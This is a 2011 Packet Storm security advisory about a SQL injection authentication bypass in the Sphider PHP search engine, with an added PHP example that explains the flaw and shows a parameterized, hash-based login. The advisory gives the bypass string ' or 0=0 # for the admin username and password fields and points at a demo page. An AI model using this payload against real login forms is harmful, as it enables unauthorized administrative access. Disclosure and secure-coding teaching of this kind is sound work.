Sphider SQL Injection

2011-07-12T00:00:00
ID PACKETSTORM:102981
Type packetstorm
Reporter Karthik R
Modified 2011-07-12T00:00:00

Description

                                        
`Sphider SQL injection vulnerabilities  
  
vendor: www.sphider.eu  
Author: Karthik R (3psil0nLambDa)  
Email: Karthik.cupid@gmail.com  
My blog: epsilonlambda.co.cc  
Google dork: © Ando Saabas 2005-2007  
  
Description of Sphider  
  
Sphider is a lightweight web spider and search engine written in PHP, using MySQL as its back end database. It is a great tool for adding search functionality to your web site or building your custom search engine. Sphider is small, easy to set up and modify, and is used in thousands of websites across the world.   
  
Exploits:  
  
SQLi Vulnerability  
  
An attacker can use this authentication bypass to get into the admin panel in the http://www.sphider.eu/demo.php section of the site.  
  
Exploit: Username: ' or 0=0 #  
Password: ' or 0=0 #  
-----------------------------------------------------------------------------------------------------------------------------  
Tribute to side^effects and love to taashu.  
-----------------------------------------------------------------------------------------------------------------------------  
`
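
Why the login strings above bypass authentication, and the corrected pattern, as an added example that is not part of the original advisory and is not Sphider's code. It assumes the login check concatenates input into a query of the shape shown; the `admin` table, its columns, and both function names are hypothetical, and an in-memory SQLite database (PHP `pdo_sqlite` extension) stands in for MySQL so the hardened path runs offline.

```php
<?php
// Added example. Table, columns and function names are hypothetical,
// not taken from Sphider's source or schema.

// Vulnerable pattern: request input is pasted into the SQL text, so a quote
// in the input ends the string literal and the rest is parsed as SQL.
function build_login_query_unsafe(string $user, string $pass): string
{
    return "SELECT id FROM admin WHERE username='$user' AND password='$pass'";
}

// Hardened pattern: the username is bound as a parameter (data, never SQL),
// and the password is checked against a stored hash outside the query.
function login_safe(PDO $db, string $user, string $pass): bool
{
    $stmt = $db->prepare('SELECT pass_hash FROM admin WHERE username = ?');
    $stmt->execute([$user]);
    $hash = $stmt->fetchColumn();          // false when no row matches
    return is_string($hash) && password_verify($pass, $hash);
}

// Constructed sample data: one admin account with a constructed password.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT, pass_hash TEXT)');
$ins = $db->prepare('INSERT INTO admin (username, pass_hash) VALUES (?, ?)');
$ins->execute(['admin', password_hash('constructed-sample-password', PASSWORD_DEFAULT)]);

$input = "' or 0=0 #";                     // the string given in the advisory

// Concatenated query: MySQL treats "#" as a comment to end of line, so the
// statement that remains is  ... WHERE username='' or 0=0  (true for every row).
echo build_login_query_unsafe($input, $input), PHP_EOL;

// Parameterized check: the same string is only ever compared as a username.
echo 'advisory input accepted: ';
var_dump(login_safe($db, $input, $input));
echo 'valid credentials accepted: ';
var_dump(login_safe($db, 'admin', 'constructed-sample-password'));
```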